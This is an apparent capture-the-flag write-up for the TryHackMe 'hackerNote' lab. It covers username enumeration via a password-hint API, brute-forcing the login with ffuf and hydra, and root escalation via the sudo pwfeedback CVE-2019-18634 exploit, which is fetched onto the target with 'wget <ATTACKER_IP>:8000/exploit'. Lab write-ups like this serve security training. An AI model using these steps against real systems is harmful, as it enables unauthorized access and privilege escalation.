# Initial Information

> A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.

> [room link](https://tryhackme.com/room/hackernote), creator: [NinjaJc01](https://tryhackme.com/p/NinjaJc01)

# Enumeration

As always, we can start with an `nmap` scan to discover open ports on the target machine.

```
$ nmap -sC -sV -p- -oN scans/tcpfull 10.10.67.60
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
|   256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_  256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp   open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home - hackerNote
8080/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home - hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## http - 80, 8080/tcp

For first, we can see there are 2 web ports(80, 8080) and they are running the same service(hackerNote).
And there is one more interesting thing. The box runs a go webserver.

We can create a new account, log in and we can now start exploring the site's functionalities.

Looking into the source we can find some interesting **javascript files** and some **api endpoints**.
But nothing really out of the ordinary so we can go back a littlebit and test the login functionality.

### Testing the login page

We know that if we provide correct credentials we get logged in and the website redirects us to /note.

But if we try other creds the loginpage says(when I use my username and a random password it has a little delay):

> *Invalid Username Or Password*

If we give it only a username: `asd` it says:

> *Wrong credential encoding*

Which is interesting behavior.

There is an other functionality that can be used maliciously which is the **Password Reset**.

We can give it our registered username (which is `asd` for me) and the site returns:

> Hint: asd

But if we try with `admin` it doesn't return anything!

From this point I recommend going back to the roots and use `curl` to check what's really going on in the background. We can use **devtools** to copy the cURL request of the `I forgot my password` button.

```
$ curl 'http://10.10.67.60/api/user/passwordhint/asd'
{"hint":"asd","username":"asd"}
```

- When I registered I used `asd:asd:asd` and that's the reason why it printed asd

**Fuzzing the admin user's name:**

We can try use `ffuf` to fuzz the administrator's username and get his hint.

```
$ ffuf -u 'http://10.10.67.60/api/user/passwordhint/FUZZ' -w /opt/SecLists/Usernames/Names/names.txt
jXXXs                   [Status: 200, Size: 74, Words: 7, Lines: 2]
```

- We got a user! So let's try getting his **password hint**!

```
$ curl 'http://10.10.67.60/api/user/passwordhint/jXXXs'
{"hint":"My favourite colour and my favourite number","username":"jXXXs"}
```

- The user's password consists of a **color and a number**!

# Exploitation

## Making a password list

We can try to make a list of colors and generate passwords based on this color and a random number.
This is the time when `hashcat` scripts can be very handy.

- [github.com/hashcat/hashcat-utils/releases](https://github.com/hashcat/hashcat-utils/releases)

We can download the zip file and extract it then we can use `bin/combinator.bin` to combinate our colors.txt and numbers.txt file from the zip file we can download from the box's thm roompage [local copy](files/wordlists.zip).

- [files/wordlists.zip](files/wordlists.zip)
- [files/colors.txt](files/colors.txt)
- [files/numbers.txt](files/numbers.txt)

**Combining the 2 files:**

```
$ ./combinator.bin files/colors.txt files/numbers.txt > files/wordlist.txt
```

- [files/wordlist.txt](files/wordlist.txt)

## Cracking the password

Now, we have a wordlist so we can try to get into the app! I will use `ffuf` again.
I copied the login request as cURL from my browser's devtools and cleaned up a bit.

```
$ curl -L 'http://10.10.67.60/api/user/login' -d '{"username":"asd","password":"asd"}'
{"status":"Invalid Username Or Password"}
```

- `curl` returns `{"status":"Invalid Username Or Password"}` with the correct credentials

We miss some headers! So let's add those in.

```
$ curl 'http://10.10.67.60/api/user/login' -d '{"username":"asd","password":"asd"}' -H 'Content-Type: application/json' -H 'Content-Type: application/x-www-form-urlencoded'
{"SessionToken":"51d8e345c24e9ad806a6229f1fb5ce27","status":"success"}
```

Now, we can use `ffuf` to brute force the password of our known user.

```
$ ffuf -u 'http://10.10.67.60/api/user/login' -d '{"username":"jXXXs","password":"FUZZ"}' -H 'Content-Type: application/json' -H 'Content-Type: application/x-www-form-urlencoded' -w files/wordlist.txt
```

- But every response is the same in ffuf and wfuzz (42 chars long) :(

So what can we do? We can use `hydra` instead of `ffuf` or `wfuzz`.

```
$ hydra -l jXXXs -P files/wordlist.txt 10.10.67.60 http-post-form '/api/user/login':'username=^USER^&password=^PASS^':'Invalid Username Or Password'
[80][http-post-form] host: 10.10.67.60   login: jXXXs   password: bXXXX
```

`hydra` can be old and slower but it still finds the correct password for us!

## Logging into the webapp

After we log into the webapp we can find a note about the target user's ssh password.

> **My SSH details**
> So that I don't forget, my SSH password is dXXXXXXXXb

## Logging into ssh

```
$ ssh jXXXs@10.10.67.60
dXXXXXXXXb
jXXXs@hackernote:~$ id
uid=1001(jXXXs) gid=1001(jXXXs) groups=1001(jXXXs)
```

# Privilege Escalation from jXXXs

As always we can run `sudo -l` to see if our target user can run sudo or not.
When we paste the user's password we can see these little stars
which are password length indicators.

```
jXXXs@hackernote:~$ sudo -l
[sudo] password for jXXXs: **********
```

I instantly knew there is a CVE out there which makes a use of this feature if it's enabled.

- [m4t3sz.gitlab.io/posts/tryhackme/sudo_bof_pwfeedback/](https://m4t3sz.gitlab.io/posts/tryhackme/sudo_bof_pwfeedback/)

- [github.com/saleemrashid/sudo-cve-2019-18634](https://github.com/saleemrashid/sudo-cve-2019-18634)

We can use `git` to download the exploit's repo to our machine and then compile `exploit.c` with `gcc` on our **local machine**.

On **local** machine:

```
$ git clone https://github.com/saleemrashid/sudo-cve-2019-18634
$ cd sudo-cve-2019-18634
$ gcc exploit.c -o exploit
$ python3 -m http.server 8000
```

On **target** machine:

```
$ wget <ATTACKER_IP>:8000/exploit
$ chmod +x exploit
$ ./exploit
```

- From now, we should have gotten a root shell!

Here's my target's terminal:

```
jXXXs@hackernote:~$ wget 10.8.2.82:8000/exploit
--2021-02-05 14:12:45--  http://10.8.2.82:8000/exploit
Connecting to 10.8.2.82:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17488 (17K) [application/octet-stream]
Saving to: ‘exploit’

exploit                    100%[=====================================>]  17.08K  --.-KB/s    in 0.06s

2021-02-05 14:12:45 (282 KB/s) - ‘exploit’ saved [17488/17488]

jXXXs@hackernote:~$ chmod +x exploit
jXXXs@hackernote:~$ ./exploit
[sudo] password for jXXXs:
Sorry, try again.
# id
uid=0(root) gid=0(root) groups=0(root),1001(jXXXs)
```


# Further reading - [tryhackme.com/room/hackernote](https://tryhackme.com/room/hackernote)

## Timing attacks on logins
- [seclists.org/fulldisclosure/2016/Jul/51](https://seclists.org/fulldisclosure/2016/Jul/51)
- [www.gnucitizen.org/blog/username-enumeration-vulnerabilities/](https://www.gnucitizen.org/blog/username-enumeration-vulnerabilities/)
- [wiki.owasp.org/index.php/Testing\_for\_User\_Enumeration\_and\_Guessable\_User\_Account\_(OWASP-AT-002)](https://wiki.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002))

## Adobe Password Breach
- [nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/](https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/)


## Sudo CVE
- [https://dylankatz.com/Analysis-of-CVE-2019-18634/](https://dylankatz.com/Analysis-of-CVE-2019-18634/)
- [https://nvd.nist.gov/vuln/detail/CVE-2019-18634](https://nvd.nist.gov/vuln/detail/CVE-2019-18634)
- [https://tryhackme.com/room/sudovulnsbof](https://tryhackme.com/room/sudovulnsbof)
